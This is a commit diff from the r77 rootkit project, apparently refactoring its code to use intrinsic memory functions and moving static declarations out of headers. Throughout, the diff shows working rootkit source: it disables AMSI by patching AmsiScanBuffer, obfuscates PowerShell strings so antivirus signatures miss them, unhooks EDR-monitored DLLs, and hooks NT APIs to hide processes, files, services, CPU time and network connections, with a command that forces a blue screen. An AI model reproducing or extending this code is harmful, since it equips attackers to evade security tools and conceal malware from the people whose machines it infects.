Use intrinsics; refactoring

bytecode77 · Oct 29, 2022 · f58515c · f58515c
1 parent ded9708
commit f58515c
Show file tree

Hide file tree

Showing 24 changed files with 413 additions and 453 deletions.
diff --git a/Example/Example.csproj b/Example/Example.csproj
@@ -28,7 +28,7 @@
   </PropertyGroup>
   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
     <PlatformTarget>AnyCPU</PlatformTarget>
-    <DebugType>pdbonly</DebugType>
+    <DebugType>none</DebugType>
     <Optimize>true</Optimize>
     <OutputPath>bin\Release\</OutputPath>
     <DefineConstants>TRACE</DefineConstants>

diff --git a/Install/Install.c b/Install/Install.c
@@ -2,10 +2,8 @@
 #include "resource.h"
 #include "r77def.h"
 #include "r77win.h"
-#include "r77runtime.h"
 #include <wchar.h>
 #include <Shlwapi.h>
-#include <VersionHelpers.h>
 
 int main()
 {
@@ -66,7 +64,7 @@ LPWSTR GetPowershellCommand(BOOL is64Bit)
 	// AMSI must be disabled for the entire process, because both powershell and .NET itself implement AMSI.
 
 	// AMSI is only supported on Windows 10.
-	if (IsWindows10OrGreater2())
+	if (R77_IsWindows10OrGreater())
 	{
 		// Patch amsi.dll!AmsiScanBuffer prior to [Reflection.Assembly]::Load.
 		// Do not use Add-Type, because it will invoke csc.exe and compile a C# DLL to disk.
@@ -177,7 +175,7 @@ VOID ObfuscatePowershellVariable(LPWSTR command, LPCWSTR variableName)
 	{
 		for (LPWSTR ocurrence; ocurrence = StrStrIW(command, variableName);)
 		{
-			libc_wmemcpy(ocurrence, newName, length);
+			i_wmemcpy(ocurrence, newName, length);
 		}
 	}
 }
@@ -193,7 +191,7 @@ VOID ObfuscatePowershellStringLiterals(LPWSTR command)
 	// will eventually end up in a list of known signatures.
 
 	PWCHAR newCommand = NEW_ARRAY(WCHAR, 16384);
-	libc_memset(newCommand, 0, 16384 * sizeof(WCHAR));
+	i_wmemset(newCommand, 0, 16384);
 
 	LPBYTE random = NEW_ARRAY(BYTE, 16384);
 	if (!GetRandomBytes(random, 16384)) return;
@@ -225,10 +223,10 @@ VOID ObfuscatePowershellStringLiterals(LPWSTR command)
 		{
 			WCHAR c = beginQuote[i + 1];
 			WCHAR charNumber[10];
-			libc_ltow(c, charNumber);
+			Int32ToStrW(c, charNumber);
 
 			WCHAR obfuscatedChar[20];
-			libc_memset(obfuscatedChar, 0, 20 * sizeof(WCHAR));
+			i_wmemset(obfuscatedChar, 0, 20);
 
 			// Randomly choose an obfuscation technique.
 			switch ((*randomPtr++) & 3)

diff --git a/Service/ProcessListener.c b/Service/ProcessListener.c
@@ -1,7 +1,6 @@
 #include "ProcessListener.h"
 #include "r77def.h"
 #include "r77win.h"
-#include "r77runtime.h"
 #include <Psapi.h>
 
 VOID NewProcessListener(DWORD interval, PROCESSIDCALLBACK callback)
@@ -44,7 +43,7 @@ static DWORD WINAPI NewProcessListenerThread(LPVOID parameter)
 				if (isNew) notifier->Callback(currendProcesses[i]);
 			}
 
-			libc_memcpy(previousProcesses, currendProcesses, sizeof(DWORD) * 10000);
+			i_memcpy(previousProcesses, currendProcesses, sizeof(DWORD) * 10000);
 			previousProcessCount = currendProcessCount;
 		}
 

diff --git a/Service/Service.c b/Service/Service.c
@@ -2,19 +2,17 @@
 #include "resource.h"
 #include "r77def.h"
 #include "r77win.h"
-#include "r77runtime.h"
 #include "r77config.h"
 #include "r77process.h"
 #include "ProcessListener.h"
 #include "ControlPipeListener.h"
 #include <Psapi.h>
-#include <VersionHelpers.h>
 
 int main()
 {
 	// Unhook DLL's that are monitored by EDR.
 	UnhookDll(L"ntdll.dll");
-	if (IsWindows10OrGreater2() || BITNESS(64))
+	if (R77_IsWindows10OrGreater() || BITNESS(64))
 	{
 		// Unhooking kernel32.dll on Windows 7 x86 fails.
 		//TODO: Find out why unhooking kernel32.dll on Windows 7 x86 fails.
@@ -283,11 +281,11 @@ VOID ControlCallback(DWORD controlCode, HANDLE pipe)
 								LPBYTE redirectedData = NEW_ARRAY(BYTE, redirectedDataSize);
 
 								DWORD offset = 0;
-								libc_memcpy(redirectedData + offset, path, pathSize);
+								i_memcpy(redirectedData + offset, path, pathSize);
 								offset += pathSize;
-								libc_memcpy(redirectedData + offset, &fileSize, sizeof(DWORD));
+								i_memcpy(redirectedData + offset, &fileSize, sizeof(DWORD));
 								offset += sizeof(DWORD);
-								libc_memcpy(redirectedData + offset, file, fileSize);
+								i_memcpy(redirectedData + offset, file, fileSize);
 
 								RedirectCommand64(controlCode, redirectedData, redirectedDataSize);
 								FREE(redirectedData);
@@ -303,10 +301,10 @@ VOID ControlCallback(DWORD controlCode, HANDLE pipe)
 		case CONTROL_SYSTEM_BSOD:
 		{
 			BOOLEAN previousValue = FALSE;
-			RtlAdjustPrivilege(20, TRUE, FALSE, &previousValue);
+			R77_RtlAdjustPrivilege(20, TRUE, FALSE, &previousValue);
 
 			BOOLEAN oldIsCritical = FALSE;
-			RtlSetProcessIsCritical(TRUE, &oldIsCritical, FALSE);
+			R77_RtlSetProcessIsCritical(TRUE, &oldIsCritical, FALSE);
 
 			ExitProcess(0);
 			break;

diff --git a/Stager/Stager.csproj b/Stager/Stager.csproj
@@ -27,7 +27,7 @@
   </PropertyGroup>
   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
     <PlatformTarget>AnyCPU</PlatformTarget>
-    <DebugType>pdbonly</DebugType>
+    <DebugType>none</DebugType>
     <Optimize>true</Optimize>
     <OutputPath>bin\Release\</OutputPath>
     <DefineConstants>TRACE</DefineConstants>

diff --git a/TestConsole/TestConsole.csproj b/TestConsole/TestConsole.csproj
@@ -32,7 +32,7 @@
     <OutputPath>bin\Release\</OutputPath>
     <DefineConstants>TRACE</DefineConstants>
     <Optimize>true</Optimize>
-    <DebugType>pdbonly</DebugType>
+    <DebugType>none</DebugType>
     <PlatformTarget>AnyCPU</PlatformTarget>
     <LangVersion>7.3</LangVersion>
     <ErrorReport>prompt</ErrorReport>

diff --git a/r77/Config.c b/r77/Config.c
@@ -1,6 +1,9 @@
 #include "Config.h"
 #include "r77win.h"
 
+static HANDLE ConfigThread;
+static PR77_CONFIG Configuration;
+
 VOID InitializeConfig()
 {
 	// The configuration is read periodically in a background thread.

diff --git a/r77/Config.h b/r77/Config.h
@@ -1,10 +1,8 @@
+#include "r77mindef.h"
 #include "r77config.h"
 #ifndef _CONFIG_H
 #define _CONFIG_H
 
-static HANDLE ConfigThread;
-static PR77_CONFIG Configuration;
-
 /// <summary>
 /// Initializes the configuration system.
 /// </summary>

diff --git a/r77/Hooks.c b/r77/Hooks.c
@@ -1,15 +1,24 @@
 #include "Hooks.h"
 #include "Rootkit.h"
 #include "Config.h"
-#include "r77mindef.h"
 #include "r77def.h"
 #include "r77win.h"
 #include "ntdll.h"
-#include "r77runtime.h"
 #include "detours.h"
 #include <Shlwapi.h>
 #include <wchar.h>
 
+static NT_NTQUERYSYSTEMINFORMATION OriginalNtQuerySystemInformation;
+static NT_NTRESUMETHREAD OriginalNtResumeThread;
+static NT_NTQUERYDIRECTORYFILE OriginalNtQueryDirectoryFile;
+static NT_NTQUERYDIRECTORYFILEEX OriginalNtQueryDirectoryFileEx;
+static NT_NTENUMERATEKEY OriginalNtEnumerateKey;
+static NT_NTENUMERATEVALUEKEY OriginalNtEnumerateValueKey;
+static NT_ENUMSERVICEGROUPW OriginalEnumServiceGroupW;
+static NT_ENUMSERVICESSTATUSEXW OriginalEnumServicesStatusExW;
+static NT_ENUMSERVICESSTATUSEXW OriginalEnumServicesStatusExW2;
+static NT_NTDEVICEIOCONTROLFILE OriginalNtDeviceIoControlFile;
+
 VOID InitializeHooks()
 {
 	DetourTransactionBegin();
@@ -129,14 +138,15 @@ static NTSTATUS NTAPI HookedNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS sy
 			LARGE_INTEGER hiddenUserTime = { 0 };
 			if (GetProcessHiddenTimes(&hiddenKernelTime, &hiddenUserTime, NULL))
 			{
+				PNT_SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION performanceInformation = (PNT_SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION)systemInformation;
 				ULONG numberOfProcessors = newReturnLength / sizeof(NT_SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION);
+
 				for (ULONG i = 0; i < numberOfProcessors; i++)
 				{
 					//TODO: This works, but it needs to be on a per-cpu basis instead of x / numberOfProcessors
-					PNT_SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION performanceInformation = &((PNT_SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION)systemInformation)[i];
-					performanceInformation->KernelTime.QuadPart += hiddenUserTime.QuadPart / numberOfProcessors;
-					performanceInformation->UserTime.QuadPart -= hiddenUserTime.QuadPart / numberOfProcessors;
-					performanceInformation->IdleTime.QuadPart += (hiddenKernelTime.QuadPart + hiddenUserTime.QuadPart) / numberOfProcessors;
+					performanceInformation[i].KernelTime.QuadPart += hiddenUserTime.QuadPart / numberOfProcessors;
+					performanceInformation[i].UserTime.QuadPart -= hiddenUserTime.QuadPart / numberOfProcessors;
+					performanceInformation[i].IdleTime.QuadPart += (hiddenKernelTime.QuadPart + hiddenUserTime.QuadPart) / numberOfProcessors;
 				}
 			}
 		}
@@ -147,10 +157,12 @@ static NTSTATUS NTAPI HookedNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS sy
 			LONGLONG hiddenCycleTime = 0;
 			if (GetProcessHiddenTimes(NULL, NULL, &hiddenCycleTime))
 			{
-				ULONG numberOfProcessors = newReturnLength / sizeof(LARGE_INTEGER);
+				PNT_SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION idleCycleTimeInformation = (PNT_SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION)systemInformation;
+				ULONG numberOfProcessors = newReturnLength / sizeof(NT_SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION);
+
 				for (ULONG i = 0; i < numberOfProcessors; i++)
 				{
-					((PLARGE_INTEGER)systemInformation)[i].QuadPart += hiddenCycleTime / numberOfProcessors;
+					idleCycleTimeInformation[i].CycleTime += hiddenCycleTime / numberOfProcessors;
 				}
 			}
 		}
@@ -219,7 +231,7 @@ static NTSTATUS NTAPI HookedNtQueryDirectoryFile(HANDLE fileHandle, HANDLE event
 			{
 				if (nextEntryOffset)
 				{
-					RtlCopyMemory
+					i_memcpy
 					(
 						current,
 						(LPBYTE)current + nextEntryOffset,
@@ -281,7 +293,7 @@ static NTSTATUS NTAPI HookedNtQueryDirectoryFileEx(HANDLE fileHandle, HANDLE eve
 				{
 					if (nextEntryOffset)
 					{
-						RtlCopyMemory
+						i_memcpy
 						(
 							current,
 							(LPBYTE)current + nextEntryOffset,
@@ -393,7 +405,7 @@ static NTSTATUS NTAPI HookedNtDeviceIoControlFile(HANDLE fileHandle, HANDLE even
 		{
 			// Check, if the device is "\Device\Nsi"
 			BYTE deviceName[500];
-			if (NT_SUCCESS(NtQueryObject2(fileHandle, ObjectNameInformation, deviceName, 500, NULL)) &&
+			if (NT_SUCCESS(R77_NtQueryObject(fileHandle, ObjectNameInformation, deviceName, 500, NULL)) &&
 				!StrCmpNIW(DEVICE_NSI, ((PUNICODE_STRING)deviceName)->Buffer, sizeof(DEVICE_NSI) / sizeof(WCHAR)))
 			{
 				PNT_NSI_PARAM nsiParam = (PNT_NSI_PARAM)outputBuffer;
@@ -442,20 +454,20 @@ static NTSTATUS NTAPI HookedNtDeviceIoControlFile(HANDLE fileHandle, HANDLE even
 							{
 								if (nsiParam->Type == NsiTcp)
 								{
-									RtlMoveMemory(tcpEntry, (LPBYTE)tcpEntry + nsiParam->EntrySize, (nsiParam->Count - i - 1) * nsiParam->EntrySize);
+									memmove(tcpEntry, (LPBYTE)tcpEntry + nsiParam->EntrySize, (nsiParam->Count - i - 1) * nsiParam->EntrySize);
 								}
 								else if (nsiParam->Type == NsiUdp)
 								{
-									RtlMoveMemory(udpEntry, (LPBYTE)udpEntry + nsiParam->EntrySize, (nsiParam->Count - i - 1) * nsiParam->EntrySize);
+									memmove(udpEntry, (LPBYTE)udpEntry + nsiParam->EntrySize, (nsiParam->Count - i - 1) * nsiParam->EntrySize);
 								}
 
 								if (statusEntry)
 								{
-									RtlMoveMemory(statusEntry, (LPBYTE)statusEntry + nsiParam->StatusEntrySize, (nsiParam->Count - i - 1) * nsiParam->StatusEntrySize);
+									memmove(statusEntry, (LPBYTE)statusEntry + nsiParam->StatusEntrySize, (nsiParam->Count - i - 1) * nsiParam->StatusEntrySize);
 								}
 								if (processEntry)
 								{
-									RtlMoveMemory(processEntry, (LPBYTE)processEntry + nsiParam->ProcessEntrySize, (nsiParam->Count - i - 1) * nsiParam->ProcessEntrySize);
+									memmove(processEntry, (LPBYTE)processEntry + nsiParam->ProcessEntrySize, (nsiParam->Count - i - 1) * nsiParam->ProcessEntrySize);
 								}
 							}
 
@@ -556,7 +568,7 @@ static LPWSTR FileInformationGetName(LPVOID fileInformation, FILE_INFORMATION_CL
 
 	if (fileName && fileNameLength > 0)
 	{
-		wmemcpy(name, fileName, fileNameLength / sizeof(WCHAR));
+		i_wmemcpy(name, fileName, fileNameLength / sizeof(WCHAR));
 		name[fileNameLength / sizeof(WCHAR)] = L'\0';
 		return name;
 	}
@@ -643,7 +655,7 @@ static VOID FilterEnumServiceStatus(LPENUM_SERVICE_STATUSW services, LPDWORD ser
 			IsServiceNameHidden(services[i].lpServiceName) ||
 			IsServiceNameHidden(services[i].lpDisplayName))
 		{
-			RtlMoveMemory(&services[i], &services[i + 1], (*servicesReturned - i - 1) * sizeof(ENUM_SERVICE_STATUSW));
+			memmove(&services[i], &services[i + 1], (*servicesReturned - i - 1) * sizeof(ENUM_SERVICE_STATUSW));
 			(*servicesReturned)--;
 			i--;
 		}
@@ -659,7 +671,7 @@ static VOID FilterEnumServiceStatusProcess(LPENUM_SERVICE_STATUS_PROCESSW servic
 			IsServiceNameHidden(services[i].lpServiceName) ||
 			IsServiceNameHidden(services[i].lpDisplayName))
 		{
-			RtlMoveMemory(&services[i], &services[i + 1], (*servicesReturned - i - 1) * sizeof(ENUM_SERVICE_STATUS_PROCESSW));
+			memmove(&services[i], &services[i + 1], (*servicesReturned - i - 1) * sizeof(ENUM_SERVICE_STATUS_PROCESSW));
 			(*servicesReturned)--;
 			i--;
 		}

diff --git a/r77/Hooks.h b/r77/Hooks.h
@@ -3,17 +3,6 @@
 #ifndef _HOOKS_H
 #define _HOOKS_H
 
-static NT_NTQUERYSYSTEMINFORMATION OriginalNtQuerySystemInformation;
-static NT_NTRESUMETHREAD OriginalNtResumeThread;
-static NT_NTQUERYDIRECTORYFILE OriginalNtQueryDirectoryFile;
-static NT_NTQUERYDIRECTORYFILEEX OriginalNtQueryDirectoryFileEx;
-static NT_NTENUMERATEKEY OriginalNtEnumerateKey;
-static NT_NTENUMERATEVALUEKEY OriginalNtEnumerateValueKey;
-static NT_ENUMSERVICEGROUPW OriginalEnumServiceGroupW;
-static NT_ENUMSERVICESSTATUSEXW OriginalEnumServicesStatusExW;
-static NT_ENUMSERVICESSTATUSEXW OriginalEnumServicesStatusExW2;
-static NT_NTDEVICEIOCONTROLFILE OriginalNtDeviceIoControlFile;
-
 /// <summary>
 /// Attaches hooks to r77 specific API's.
 /// </summary>